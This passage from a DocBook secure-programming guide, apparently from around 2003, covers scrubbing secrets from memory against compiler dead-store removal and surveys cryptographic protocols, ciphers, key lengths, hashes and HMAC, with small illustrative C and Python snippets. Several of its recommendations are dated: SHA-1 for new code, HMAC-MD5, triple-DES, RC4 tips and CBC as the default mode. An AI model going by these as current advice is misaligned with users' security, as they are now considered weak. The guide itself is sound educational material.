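finally:
    wipe(password)  # runs even if the check raises an exception

print(ok, password)
```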
|
||
|
||
<para>
|
||
In many languages (including C and C++),
|
||
be careful that the compiler doesn't optimize away the "dead code"
|
||
for overwriting the value - since in this case it's not dead code.
|
||
Many compilers, including many C/C++ compilers, remove writes
|
||
to stores that are no longer used - this is often referred to as
|
||
"dead store removal."
|
||
Unfortunately, if the write is really to overwrite the value of a secret,
|
||
this means that code that appears to be correct will be silently discarded.
|
||
Ada provides the pragma Inspection_Point; place this after the
|
||
code erasing the memory, and that way you can be certain that
|
||
the object containing the secret will really be erased
|
||
(and that the overwriting won't be optimized away).
|
||
</para>
|
||
|
||
<para>
|
||
<!-- "When scrubbing secrets doesn't work" discusses this in Bugtraq
|
||
November 2002, but this is actually a really old issue that keeps
|
||
re-surfacing.
|
||
-->
|
||
A Bugtraq post by Andy Polyakov (November 7, 2002) reported that
|
||
the C/C++ compilers gcc version 3 or higher, SGI MIPSpro, and the Microsoft
|
||
compilers eliminated simple inlined calls to memset
|
||
intended to overwrite secrets.
|
||
This is allowed by the C and C++ standards.
|
||
Other C/C++ compilers (such as gcc less than version 3) preserved the inlined
|
||
call to memset at all optimization levels, showing that the issue
|
||
is compiler-specific.
|
||
Simply declaring that the destination data is volatile doesn't
|
||
help on all compilers; both the MIPSpro and Microsoft compilers
|
||
ignored simple "volatilization".
|
||
Simply "touching" the first byte of the secret data doesn't help either;
|
||
he found that the MIPSpro and GCC>=3 cleverly nullify only the first byte
|
||
and leave the rest intact (which is actually quite clever - the problem
|
||
is that the compiler's cleverness is interfering with our goals).
|
||
One approach that
|
||
seems to work on all platforms is to
|
||
write your own implementation of memset with internal "volatilization"
|
||
of the first argument (this code is based on a
|
||
<ulink url="http://online.securityfocus.com/archive/82/298061/2002-10-27/2002-11-02/0">workaround proposed by Michael Howard</ulink>):
|
||
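<programlisting>
#include &lt;stddef.h&gt;  /* for size_t */
/* The volatile-qualified pointer forces every store to actually happen. */
void *guaranteed_memset(void *v, int c, size_t n)
{ volatile char *p = v; while (n--) *p++ = c; return v; }
</programlisting>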
|
||
Then place this definition into an external file to force the function to
|
||
be external (declare the function in a corresponding .h file, and #include
|
||
the file in the callers, as is usual).
|
||
This approach appears to be safe
|
||
at any optimization level (even if the function gets inlined).
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="crypto">
|
||
<title>Cryptographic Algorithms and Protocols</title>
|
||
|
||
<para>
|
||
Often cryptographic algorithms and protocols are necessary to keep
|
||
a system secure, particularly when communicating through an untrusted
|
||
network such as the Internet.
|
||
Where possible, use cryptographic techniques to authenticate information and
|
||
keep the information private
|
||
(but don't assume that simple encryption automatically authenticates as well).
|
||
Generally you'll need to use a suite of available tools to
|
||
secure your application.
|
||
</para>
|
||
|
||
<para>
|
||
For background information and code, you should probably look at
|
||
the classic text ``Applied Cryptography'' [Schneier 1996].
|
||
The newsgroup ``sci.crypt'' has a series of FAQ's; you can find them
|
||
at many locations, including
|
||
<ulink url="http://www.landfield.com/faqs/cryptography-faq">http://www.landfield.com/faqs/cryptography-faq</ulink>.
|
||
Linux-specific resources include the Linux Encryption HOWTO at
|
||
<ulink
|
||
url="http://marc.mutz.com/Encryption-HOWTO/">http://marc.mutz.com/Encryption-HOWTO/</ulink>.
|
||
A discussion on how protocols use the basic algorithms can be
|
||
found in [Opplinger 1998].
|
||
A useful collection of papers on how to apply cryptography in
|
||
protocols can be found in [Stallings 1996].
|
||
What follows here is just a few comments; these areas are rather
|
||
specialized and covered more thoroughly elsewhere.
|
||
</para>
|
||
|
||
<para>
|
||
Cryptographic protocols and algorithms are difficult to get right,
|
||
so do not create your own.
|
||
Instead, where you can, use protocols and algorithms that are
|
||
widely-used, heavily analyzed, and accepted as secure.
|
||
When you must create anything, give the approach wide public review and
|
||
make sure that professional security analysts examine it for problems.
|
||
In particular, do not create your own encryption algorithms unless you are
|
||
an expert in cryptology, know what you're doing, and plan to spend
|
||
years in professional review of the algorithm.
|
||
Creating encryption algorithms (that are any good) is a task for experts only.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
A number of algorithms are patented; even if the owners permit
|
||
``free use'' at the moment, without a signed contract they can always
|
||
change their minds later, putting you at extreme risk later.
|
||
In general, avoid all patented algorithms -
|
||
in most cases there's an unpatented approach that is at least as good
|
||
or better technically, and by doing so you avoid a large number
|
||
of legal problems.
|
||
</para>
|
||
|
||
<para>
|
||
Another complication is that many countries regulate or restrict
|
||
cryptography in some way.
|
||
A survey of legal issues is available at the ``Crypto Law Survey'' site,
|
||
<ulink url="http://rechten.kub.nl/koops/cryptolaw/">http://rechten.kub.nl/koops/cryptolaw/</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Often, your software should provide a way to
|
||
reject ``too small'' keys, and let the user set what ``too small'' is.
|
||
For RSA keys, 512 bits is too small for use.
|
||
There is increasing evidence that
|
||
1024 bits for RSA keys is not enough either;
|
||
Bernstein has suggested techniques that simplify brute-forcing RSA, and
|
||
other work based on it
|
||
(such as Shamir and Tromer's "Factoring Large Numbers with the TWIRL device")
|
||
now suggests that 1024 bit keys can be broken in a year
|
||
by a $10 Million device.
|
||
You may want to
|
||
make 2048 bits the minimum for RSA if you really want a secure system,
|
||
and you should certainly do so if you plan to use those keys after 2015.
|
||
For more about RSA specifically, see
|
||
<ulink url="http://www.rsasecurity.com/rsalabs/technotes/bernstein.html">RSA's
|
||
commentary on Bernstein's work</ulink>.
|
||
For a more general discussion of key length and other general
|
||
cryptographic algorithm issues, see
|
||
<ulink url="http://csrc.nist.gov/encryption/kms/key-management-guideline-(workshop).pdf">NIST's key management workshop in November 2001</ulink>.
|
||
</para>
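<para>
A minimal sketch of such a ``too small'' check follows.
The names check_rsa_key_size, KeyTooSmallError and DEFAULT_MIN_RSA_BITS are
hypothetical; the default of 2048 bits is the figure suggested above, and
the caller can override it.
</para>

```python
DEFAULT_MIN_RSA_BITS = 2048  # default taken from the suggestion in the text


class KeyTooSmallError(ValueError):
    """Raised when a key is shorter than the configured minimum."""


def check_rsa_key_size(modulus, min_bits=DEFAULT_MIN_RSA_BITS):
    """Return the modulus size in bits, or raise if it is below min_bits."""
    bits = modulus.bit_length()
    if min_bits > bits:
        raise KeyTooSmallError(
            "RSA modulus has %d bits; at least %d required" % (bits, min_bits)
        )
    return bits


# A stand-in number of the right size, not a real RSA modulus.
print(check_rsa_key_size(1 << 2047))
```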
|
||
|
||
<sect2 id="crypto-protocols">
|
||
<title>Cryptographic Protocols</title>
|
||
|
||
<para>
|
||
When you need a security protocol, try to use standard-conforming protocols
|
||
such as IPSec, SSL (soon to be TLS), SSH, S/MIME, OpenPGP/GnuPG/PGP,
|
||
and Kerberos.
|
||
Each has advantages and disadvantages;
|
||
many of them overlap somewhat in functionality, but each tends to be
|
||
used in different areas:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
<para>
|
||
Internet Protocol Security (IPSec).
|
||
IPSec provides encryption and/or authentication at the IP packet level.
|
||
However, IPSec is often used in a way that
|
||
only guarantees authenticity of two
|
||
communicating hosts, not of the users.
|
||
As a practical matter, IPSec usually requires low-level support
|
||
from the operating system (which not all implement) and
|
||
an additional keyring server that must be configured.
|
||
Since IPSec can be used as a "tunnel" to secure packets belonging to
|
||
multiple users and multiple hosts, it is especially useful for
|
||
building a Virtual Private Network (VPN) and connecting a remote machine.
|
||
As of this time, it is much less often used to secure communication
|
||
from individual clients to servers.
|
||
The new version of the Internet Protocol, IPv6, comes with
|
||
IPSec ``built in,'' but IPSec also works with the more common IPv4 protocol.
|
||
Note that if you use IPSec, don't use the encryption mode without the
|
||
authentication, because the authentication also acts as
|
||
integrity protection.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Secure Socket Layer (SSL) / TLS.
|
||
SSL/TLS works over TCP and tunnels other protocols using TCP, adding
|
||
encryption, authentication of the server, and optional authentication
|
||
of the client (but authenticating clients using SSL/TLS requires
|
||
that clients have configured X.509 client certificates, something
|
||
rarely done).
|
||
SSL version 3 is widely used; TLS is a later adjustment to SSL that
|
||
strengthens its security and improves its flexibility.
|
||
Currently there is a slow transition going on from SSLv3 to TLS, aided
|
||
because implementations can easily try to use TLS and then back off to SSLv3
|
||
without user intervention.
|
||
Unfortunately, a few bad SSLv3 implementations cause problems with the
|
||
backoff, so you may need a preferences setting to allow users to skip
|
||
using TLS if necessary.
|
||
Don't use SSL version 2; it has some serious security weaknesses.
|
||
</para>
|
||
<para>
|
||
SSL/TLS is the primary method for protecting http (web) transactions.
|
||
Any time you use an "https://" URL, you're using SSL/TLS.
|
||
Other protocols that often use SSL/TLS include POP3 and IMAP.
|
||
SSL/TLS usually uses a separate TCP/IP port
|
||
number from the unsecured port, which the IETF is a little unhappy about
|
||
(because it consumes twice as many ports; there are solutions to this).
|
||
SSL is relatively easy to use in programs, because
|
||
most library implementations allow programmers to use operations
|
||
similar to the operations on standard sockets like
|
||
SSL_connect(), SSL_write(), SSL_read(), etc.
|
||
A widely used OSS/FS implementation of SSL (as well as other capabilities)
|
||
is OpenSSL, available at
|
||
<ulink url="http://www.openssl.org">http://www.openssl.org</ulink>.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
OpenPGP and S/MIME.
|
||
There are two competing, essentially incompatible standards for
|
||
securing email: OpenPGP and S/MIME.
|
||
OpenPGP is based on the PGP application; an OSS/FS implementation is
|
||
GNU Privacy Guard from
|
||
<ulink url="http://www.gnupg.org">http://www.gnupg.org</ulink>.
|
||
Currently, their certificates are often not interchangeable;
|
||
work is ongoing to repair this.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
SSH.
|
||
SSH is the primary method of securing ``remote terminals'' over an
|
||
internet, and it also includes methods for
|
||
tunneling X Windows sessions.
|
||
However, it's been extended to support single sign-on and
|
||
general secure tunneling for TCP streams, so it's often
|
||
used for securing other data streams too (such as CVS accesses).
|
||
The most popular implementation of SSH is OpenSSH
|
||
<ulink url="http://www.openssh.com">http://www.openssh.com</ulink>,
|
||
which is OSS/FS.
|
||
Typical use of SSH allows the client to authenticate that the
|
||
server is truly the server, and
|
||
then the user enters a password to authenticate the user
|
||
(the password is encrypted and sent to the other system for verification).
|
||
Current versions of SSH can store private keys, allowing users to not
|
||
enter the password each time.
|
||
To prevent man-in-the-middle attacks, SSH records keying information
|
||
about servers it talks to; that means that typical use of
|
||
SSH is vulnerable to a man-in-the-middle attack during the
|
||
very first connection, but it can detect problems afterwards.
|
||
In contrast, SSL generally uses a certificate authority, which eliminates
|
||
the first connection problem but requires special setup (and payment!) to
|
||
the certificate authority.
|
||
</para>
|
||
</listitem>
|
||
|
||
|
||
<listitem>
|
||
<para>
|
||
Kerberos.
|
||
Kerberos is a protocol for single sign-on and authenticating users
|
||
against a central authentication and key distribution server. Kerberos
|
||
works by giving authenticated users "tickets", granting them access to
|
||
various services on the network.
|
||
When clients then contact servers, the servers can verify the tickets.
|
||
Kerberos is a primary method for securing and supporting authentication
|
||
on a LAN, and for establishing shared secrets (thus, it needs to be
|
||
used with other algorithms for the actual protection of communication).
|
||
Note that to use Kerberos, both the client and server have to include
|
||
code to use it, and since not everyone has a Kerberos setup, this has
|
||
to be optional - complicating the use of Kerberos in some programs.
|
||
However, Kerberos is widely used.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
</para>
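<para>
As one illustration of using a standard protocol through a library rather
than building your own, the sketch below prepares a client-side SSL/TLS
configuration with Python's standard ssl module.
The helper name make_client_context is hypothetical, and the TLS 1.2 floor
is an assumption chosen for the example, not a recommendation made in this
text; pick the floor your peers can actually support.
</para>

```python
import ssl


def make_client_context():
    """Build a client context that verifies the server's certificate."""
    ctx = ssl.create_default_context()  # verification and hostname check on
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # assumed floor
    return ctx


ctx = make_client_context()
print(ctx.verify_mode == ssl.CERT_REQUIRED, ctx.check_hostname)
```

<para>
A connected socket would then be wrapped with
ctx.wrap_socket(sock, server_hostname=host), after which it is read and
written much like an ordinary socket.
</para>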
|
||
|
||
|
||
|
||
<para>
|
||
Many of these protocols allow you to select a number of different
|
||
algorithms, so you'll still need to pick reasonable defaults for
|
||
algorithms (e.g., for encryption).
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="symmetric-encryption">
|
||
<title>Symmetric Key Encryption Algorithms</title>
|
||
|
||
<para>
|
||
The use, export, and/or import of implementations of
|
||
encryption algorithms are restricted in many countries, and the laws
|
||
can change quite rapidly.
|
||
Find out what the rules are before trying to build applications using
|
||
cryptography.
|
||
</para>
|
||
|
||
<para>
|
||
For secret key (bulk data) encryption algorithms,
|
||
use only encryption algorithms that have been openly published and withstood
|
||
years of attack, and check on their patent status.
|
||
I would recommend using the
|
||
new Advanced Encryption Standard (AES), also known as Rijndael --
|
||
a number of cryptographers have analyzed it and not found any serious weakness
|
||
in it, and I believe it has been through enough analysis
|
||
to be trustworthy now.
|
||
However, in August 2002
|
||
researchers Fuller and Millar
|
||
discovered a mathematical property of the cipher that,
|
||
while not an attack, might be exploitable into an attack
|
||
(the approach may actually have serious consequences for some other
|
||
algorithms, too).
|
||
Thus, it's worth staying tuned to future work.
|
||
<!--
|
||
AES property - Abstract is here:
|
||
http://eprint.iacr.org/2002/111/
|
||
Full report (postscript) written by Fuller, J, & Millar, M. (Aug, 2002):
|
||
http://eprint.iacr.org/2002/111.ps
|
||
-->
|
||
A good alternative to AES is the Serpent algorithm, which is slightly slower
|
||
but is very resistant to attack.
|
||
For many applications triple-DES is a very good encryption algorithm; it
|
||
has a reasonably lengthy key (112 bits), no patent issues, and
|
||
a very long history of withstanding attacks (it's withstood attacks far
|
||
longer than any other encryption algorithm with reasonable key length in the
|
||
public literature, so it's probably the safest publicly-available
|
||
symmetric encryption algorithm when properly implemented).
|
||
However, triple-DES is very slow when implemented in software, so
|
||
triple-DES can be considered ``safest but slowest.''
|
||
Twofish appears to be a good encryption algorithm, but there are some
|
||
lingering questions - Sean Murphy and Fauzan Mirza showed that Twofish
|
||
has properties that cause many academics to be concerned (though as of yet
|
||
no one has managed to exploit these properties).
|
||
MARS is highly resistant to ``new and novel'' attacks, but it's more complex
|
||
and is impractical on small-ability smartcards.
|
||
For the moment I would avoid Twofish - it's quite likely that this will never
|
||
be exploitable, but it's hard to be sure and there are alternative
|
||
algorithms which don't have these concerns.
|
||
Don't use IDEA - it's subject to U.S. and European patents.
|
||
Don't use stupid algorithms such as XOR with a constant or constant string,
|
||
the ROT (rotation)
|
||
scheme, Vigenere ciphers, and so on - these can be trivially broken
|
||
with today's computers.
|
||
Don't use ``double DES'' (using DES twice) - that's subject to a
|
||
``meet in the middle'' attack that triple-DES avoids.
|
||
Your protocol should support multiple encryption algorithms, anyway;
|
||
that way, when an encryption algorithm is broken,
|
||
users can switch to another one.
|
||
</para>
|
||
|
||
<para>
|
||
For symmetric-key encryption (e.g., for bulk encryption), don't use a
|
||
key length less than 90 bits if you want the information
|
||
to stay secret through 2016
|
||
(add another bit for every additional 18 months of security) [Blaze 1996].
|
||
For encrypting worthless data, the old DES algorithm has some value,
|
||
but with modern hardware it's too easy to break DES's 56-bit key using
|
||
brute force.
|
||
If you're using DES, don't just use the ASCII text key as the key -
|
||
parity is in the least (not most) significant bit, so most DES algorithms
|
||
will encrypt using a key value well-known to adversaries;
|
||
instead, create a hash of the key and set the parity bits correctly
|
||
(and pay attention to error reports from your encryption routine).
|
||
So-called ``exportable'' encryption algorithms only have effective key lengths
|
||
of 40 bits, and are essentially worthless;
|
||
in 1996 an attacker could spend $10,000 to break such keys in twelve minutes
|
||
or use idle computer time to break them in a few days,
|
||
with the time-to-break halving every 18 months in either case.
|
||
</para>
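<para>
The rule of thumb above (90 bits through 2016, plus one bit per additional
18 months) is simple arithmetic, sketched here as a small function.
The function name and its parameters are hypothetical, and the result is
only as good as the rule of thumb itself.
</para>

```python
def min_symmetric_bits(year, base_year=2016, base_bits=90, months_per_bit=18):
    """Minimum key length for data that must stay secret through `year`."""
    months = max(0, (year - base_year) * 12)
    extra_bits = -(-months // months_per_bit)  # ceiling division on integers
    return base_bits + extra_bits


for year in (2016, 2019, 2031):
    print(year, min_symmetric_bits(year))
```

<para>
For example, fifteen years past 2016 is 180 months, or ten 18-month
periods, so the rule asks for 90 + 10 = 100 bits.
</para>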
|
||
|
||
<para>
|
||
Block encryption algorithms can be used in a number of different modes, such as
|
||
``electronic code book'' (ECB) and ``cipher block chaining'' (CBC).
|
||
In nearly all cases, use CBC, and do <emphasis>not</emphasis> use ECB mode -
|
||
in ECB mode, the same block of data always returns the same result inside
|
||
a stream, and this is often enough to reveal what's encrypted.
|
||
Many modes, including CBC mode, require an ``initialization vector'' (IV).
|
||
The IV doesn't need to be secret, but it does need to be unpredictable by
|
||
an attacker.
|
||
Don't reuse IV's across sessions - use a new IV each time you start a session.
|
||
</para>
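<para>
The difference between the two modes can be seen in a small sketch.
Python's standard library has no block cipher, so toy_block below is a
stand-in built from HMAC-SHA-256 truncated to 16 bytes; it is
<emphasis>not</emphasis> a cipher (it cannot decrypt) and is an assumption
made purely to show how the modes combine blocks.
All other names are hypothetical as well.
</para>

```python
import hashlib
import hmac
import secrets

BLOCK = 16  # block size in bytes


def toy_block(key, block):
    """Stand-in for a block cipher's encryption step. Demo only."""
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def ecb(key, blocks):
    """ECB: every block is transformed independently."""
    return [toy_block(key, b) for b in blocks]


def cbc(key, iv, blocks):
    """CBC: each block is XORed with the previous output (or the IV) first."""
    out, prev = [], iv
    for b in blocks:
        mixed = bytes(x ^ y for x, y in zip(b, prev))
        prev = toy_block(key, mixed)
        out.append(prev)
    return out


key = secrets.token_bytes(16)
iv = secrets.token_bytes(BLOCK)            # fresh, unpredictable IV
blocks = [b"A" * BLOCK, b"A" * BLOCK]      # two identical plaintext blocks

ecb_out = ecb(key, blocks)
cbc_out = cbc(key, iv, blocks)
print(ecb_out[0] == ecb_out[1], cbc_out[0] == cbc_out[1])
```

<para>
In ECB the repeated plaintext block shows up as a repeated output block;
with chaining and a fresh IV it does not.
</para>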
|
||
|
||
<para>
|
||
There are a number of different streaming encryption algorithms, but
|
||
many of them have patent restrictions.
|
||
I know of no patent or technical issues with WAKE.
|
||
RC4 was a trade secret of RSA Data Security Inc; it's been leaked since,
|
||
and I know of no real legal impediment to its use, but RSA Data
|
||
Security has often threatened
|
||
court action against users of it (it's not at all clear what RSA Data
|
||
Security could do,
|
||
but no doubt they could tie up users in worthless court cases).
|
||
If you use RC4, use it as intended - in particular, always discard the
|
||
first 256 bytes it generates, or you'll be vulnerable to attack.
|
||
<!-- Fluhrer, Mantin, Shamir discuss attacks if 256 bytes not dropped -->
|
||
SEAL is patented by IBM - so don't use it.
|
||
SOBER is patented; the patent owner has claimed that it will allow many
|
||
uses for free if permission is requested, but this creates an impediment for
|
||
later use.
|
||
Even more interestingly, block encryption algorithms can be used in modes that
|
||
turn them into stream ciphers, and users who want stream ciphers should
|
||
consider this approach (you'll be able to choose between far more
|
||
publicly-available algorithms).
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
|
||
<sect2 id="public-key-encryption">
|
||
<title>Public Key Algorithms</title>
|
||
|
||
<para>
|
||
For public key cryptography (used, among other things, for
|
||
signing and sending secret keys), there are only a few
|
||
widely-deployed algorithms.
|
||
One of the most widely-used algorithms is RSA;
|
||
RSA's algorithm was patented, but only in the U.S., and that patent
|
||
expired in September 2000, so RSA can be freely used.
|
||
Never decrypt or sign a raw value that an attacker gives you directly using
|
||
RSA and expose the result, because that could expose the private key
|
||
(this isn't a problem in practice, because most protocols involve
|
||
signing a hash computed by the user - not the raw value - or don't expose
|
||
the result).
|
||
Never decrypt or sign the exact same raw value multiple times
|
||
(the original can be exposed).
|
||
Both of these can be solved by always adding random padding
|
||
(PGP does this) - the usual approach is called
|
||
Optimal Asymmetric Encryption Padding (OAEP).
|
||
</para>
|
||
|
||
<para>
|
||
The Diffie-Hellman key exchange algorithm is widely used to permit
|
||
two parties to agree on a session key. By itself it doesn't guarantee that
|
||
the parties are who they say they are, or that there is no middleman, but
|
||
it does strongly help defend against passive listeners; its patent
|
||
expired in 1997.
|
||
If you use Diffie-Hellman to create a shared secret, be sure to hash it first
|
||
(there's an attack if you use its shared value directly).
|
||
</para>
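<para>
The ``hash it first'' advice can be sketched as follows.
The prime and base are toy parameters assumed for illustration only (far
too small and not chosen for security), and derive_key is a hypothetical
helper; a real system would use a standardized group from a vetted library.
</para>

```python
import hashlib
import secrets

# Toy parameters for illustration only: NOT a secure group.
P = 2**127 - 1
G = 3


def derive_key(shared):
    """Hash the raw shared value instead of using it directly as a key."""
    raw = shared.to_bytes((P.bit_length() + 7) // 8, "big")
    return hashlib.sha256(raw).digest()


# Each side picks a private exponent and publishes G**x mod P.
a = secrets.randbelow(P - 3) + 2
b = secrets.randbelow(P - 3) + 2
pub_a = pow(G, a, P)
pub_b = pow(G, b, P)

# Each side combines its own private value with the other's public value.
key_a = derive_key(pow(pub_b, a, P))
key_b = derive_key(pow(pub_a, b, P))
print(key_a == key_b)
```

<para>
As the text notes, this exchange by itself says nothing about who is on
the other end; authentication has to come from elsewhere.
</para>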
|
||
|
||
<para>
|
||
NIST developed the digital signature standard (DSS) (it's a
|
||
modification of the ElGamal cryptosystem) for digital signature
|
||
generation and verification; one of the conditions for its development
|
||
was for it to be patent-free.
|
||
</para>
|
||
|
||
<para>
|
||
RSA, Diffie-Hellman, and ElGamal's techniques require more bits for the
|
||
keys for equivalent security compared to typical symmetric keys;
|
||
a 1024-bit key in these systems is supposed to be roughly equivalent
|
||
to an 80-bit symmetric key.
|
||
A 512-bit RSA key is considered completely unsafe;
|
||
Nicko van Someren has demonstrated that such small RSA keys
|
||
can be factored in 6 weeks using only already-available office hardware
|
||
(never mind equipment designed for the job).
|
||
<!-- http://www.mail-archive.com/cryptography%40wasabisystems.com/msg01950.html -->
|
||
In the past, a 1024-bit RSA key was considered reasonably secure, but
|
||
recent advancements in factorization algorithms
|
||
(e.g., by D. J. Bernstein) have raised concerns that perhaps even 1024 bits
|
||
is not enough for an RSA key.
|
||
Certainly, if your application needs to be highly secure or last beyond
|
||
2015, you should use 2048-bit keys.
|
||
<!--
|
||
"1024-bit RSA keys in danger of compromise" by
|
||
"Lucky Green" <shamrock@cypherpunks.to>, Bugtraq, 23 March 2002.
|
||
D.J. Bernstein paper http://cr.yp.to/papers/nfscircuit.ps
|
||
Bruce Schneier doubts it, see
|
||
http://www.counterpane.com/crypto-gram-0203.html#6
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
If you need a public key that requires far fewer bits (e.g., for
|
||
a smartcard), then you might use elliptic
|
||
curve cryptography (IEEE P1363 has some suggested curves; finding curves
|
||
is hard).
|
||
However, be careful - elliptic curve cryptography isn't patented, but
|
||
certain speedup techniques are patented.
|
||
Elliptic curve cryptography is fast enough
|
||
that it really doesn't need these speedups anyway for its usual use of
|
||
encrypting session / bulk encryption keys.
|
||
In general, you shouldn't try to do bulk encryption with elliptic keys;
|
||
symmetric algorithms are much faster and are better-tested for the job.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="hash">
|
||
<title>Cryptographic Hash Algorithms</title>
|
||
|
||
<para>
|
||
Some programs need a one-way cryptographic hash algorithm, that is, a function
|
||
that takes an ``arbitrary'' amount of data and generates a fixed-length
|
||
number that is hard for an attacker
|
||
to invert (e.g., it's difficult for an attacker to
|
||
create a different set of data to generate that same value).
|
||
For a number of years MD5 has been a favorite, but recent efforts have
|
||
shown that its 128-bit length may not be enough
|
||
[van Oorschot 1994]
|
||
and that certain attacks weaken MD5's protection
|
||
[Dobbertin 1996].
|
||
Indeed, there are rumors
|
||
that a top industry cryptographer has broken MD5, but is bound by
|
||
employee agreement to keep silent
|
||
(see the Bugtraq 22 August 2000 posting by John Viega).
|
||
Anyone can create a rumor, but enough weaknesses have been found that
|
||
the idea of completing the break is plausible.
|
||
If you're writing new code, use SHA-1 instead of MD5.
|
||
Don't use the original SHA (now called ``SHA-0'');
|
||
SHA-0 had the same weakness that MD5 does.
|
||
If you need more bits in your hash algorithm, use SHA-256, SHA-384, or
|
||
SHA-512; you can get the specifications in NIST FIPS PUB 180-2.
|
||
</para>
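<para>
As a rough illustration of the algorithms named above, the following
Python sketch computes digests with the standard hashlib module.
The helper name digest_hex is hypothetical (it is not part of any library),
and the sketch assumes the local hashlib build provides all four algorithms.
</para>

```python
import hashlib


def digest_hex(data: bytes, algorithm: str = "sha256") -> str:
    """Hash `data` with the named algorithm and return the hex digest.

    `digest_hex` is an illustrative helper, not a library function.
    """
    h = hashlib.new(algorithm)
    h.update(data)
    return h.hexdigest()


if __name__ == "__main__":
    message = b"abc"
    # Each hex character encodes 4 bits, so the digest length in bits
    # is four times the length of the hex string.
    for name in ("sha1", "sha256", "sha384", "sha512"):
        value = digest_hex(message, name)
        print(f"{name}: {len(value) * 4} bits  {value}")
```

<para>
The output length grows with the algorithm chosen, which is the
``more bits'' trade-off described above.
</para>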
|
||
</sect2>
|
||
|
||
<sect2 id="integrity-check">
|
||
<title>Integrity Checking</title>
|
||
|
||
<para>
|
||
When communicating, you need some sort of integrity check (don't depend
|
||
just on encryption, since an attacker can then induce changes of information
|
||
to ``random'' values).
|
||
This can be done with hash algorithms, but don't just use a hash function
|
||
directly (this exposes users to an ``extension'' attack - the attacker
|
||
can use the hash value, add data of their choosing, and compute the new hash).
|
||
The usual approach is ``HMAC'', which computes the integrity check as
|
||
<programlisting>
|
||
H(k xor opad, H(k xor ipad, data)).
|
||
</programlisting>
|
||
where H is the hash function (typically MD5 or SHA-1) and k is the key.
|
||
Thus, integrity checks are often HMAC-MD5 or HMAC-SHA-1.
|
||
Note that although MD5 has some weaknesses, as far as I know MD5 isn't
|
||
vulnerable when used in this construct, so HMAC-MD5 is (to my knowledge) okay.
|
||
This is defined in detail in IETF RFC 2104.
|
||
</para>
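<para>
The HMAC construction above can be sketched in Python as follows.
The function hmac_manual is a hypothetical name that spells out the RFC 2104
steps so they can be compared against Python's standard hmac module; in real
code you would presumably just call the library.
SHA-1 is used only because the text mentions it; the hash name is a parameter.
</para>

```python
import hashlib
import hmac


def hmac_manual(key: bytes, data: bytes, hash_name: str = "sha1") -> bytes:
    """Compute H((k xor opad) || H((k xor ipad) || data)) per RFC 2104.

    Illustrative only; prefer the standard `hmac` module in practice.
    """
    block_size = hashlib.new(hash_name).block_size
    if len(key) > block_size:
        # Keys longer than one hash block are hashed first.
        key = hashlib.new(hash_name, key).digest()
    key = key.ljust(block_size, b"\x00")  # zero-pad to one full block
    ipad = bytes(b ^ 0x36 for b in key)
    opad = bytes(b ^ 0x5C for b in key)
    inner = hashlib.new(hash_name, ipad + data).digest()
    return hashlib.new(hash_name, opad + inner).digest()


def verify(key: bytes, data: bytes, tag: bytes, hash_name: str = "sha1") -> bool:
    """Recompute the tag with the library and compare in constant time."""
    expected = hmac.new(key, data, hash_name).digest()
    return hmac.compare_digest(expected, tag)


if __name__ == "__main__":
    key = b"shared secret key"
    msg = b"transfer 100 to account 42"
    tag = hmac_manual(key, msg)
    print("matches library:", tag == hmac.new(key, msg, "sha1").digest())
    print("verifies:", verify(key, msg, tag))
    print("tampered verifies:", verify(key, msg + b"0", tag))
```

<para>
Because the key is mixed into both the inner and the outer hash, an attacker
who sees a tag cannot simply append data and extend it, unlike with a bare hash.
</para>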
|
||
|
||
<para>
|
||
Note that in the HMAC approach, a receiver can forge the same data as a sender.
|
||
This isn't usually a problem, but if this must be avoided, then use
|
||
public key methods and have the sender ``sign'' the data with the sender's
|
||
private key - this avoids this forging attack, but it's more expensive and
|
||
for most environments isn't necessary.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="rmac">
|
||
<title>Randomized Message Authentication Mode (RMAC)</title>
|
||
|
||
<para>
|
||
<ulink url="http://csrc.nist.gov/CryptoToolkit/modes">
|
||
NIST has developed and proposed
|
||
a new mode</ulink> for using cryptographic algorithms called
|
||
<ulink url="http://www.counterpane.com/crypto-gram-0301.html">
|
||
Randomized Message Authentication Code (RMAC)</ulink>.
|
||
RMAC is intended for use as a message authentication code technique.
|
||
</para>
|
||
|
||
<para>
|
||
Although there's a formal proof showing that RMAC is secure, the
|
||
proof depends on the highly questionable assumption that
|
||
the underlying cryptographic algorithm
|
||
meets the "ideal cipher model" - in particular, that the algorithm is
|
||
secure against a variety of specialized attacks, including related-key attacks.
|
||
Unfortunately, related-key attacks are poorly studied for many algorithms;
|
||
this is not the kind of property or attack that most people worry about
|
||
when analyzing cryptographic algorithms.
|
||
It's known that triple-DES doesn't have this property, and it's unclear if
|
||
other widely-accepted algorithms like AES have this property
|
||
(it appears that AES is at least weaker against related key attacks than
|
||
usual attacks).
|
||
</para>
|
||
|
||
<para>
|
||
The best advice right now is "don't use RMAC".
|
||
There are other ways to do message authentication, such as HMAC
|
||
combined with a cryptographic hash algorithm (e.g., HMAC-SHA1).
|
||
HMAC isn't the same thing (e.g., technically it doesn't include a
|
||
nonce, so you should rekey sooner), but the theoretical weaknesses
|
||
of HMAC are merely theoretical, while the problems in RMAC seem far
|
||
more important in the real world.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="crypto-other">
|
||
<title>Other Cryptographic Issues</title>
|
||
|
||
<para>
|
||
You should both encrypt and include integrity checks of data that's important.
|
||
Don't depend on the encryption also providing integrity - an attacker may
|
||
be able to change the bits into a different value, and although the attacker
|
||
may not be able to change it to a specific value, merely changing the
|
||
value may be enough.
|
||
In general, you should use different keys for integrity and secrecy, to
|
||
avoid certain subtle attacks.
|
||
</para>
|
||
|
||
<para>
|
||
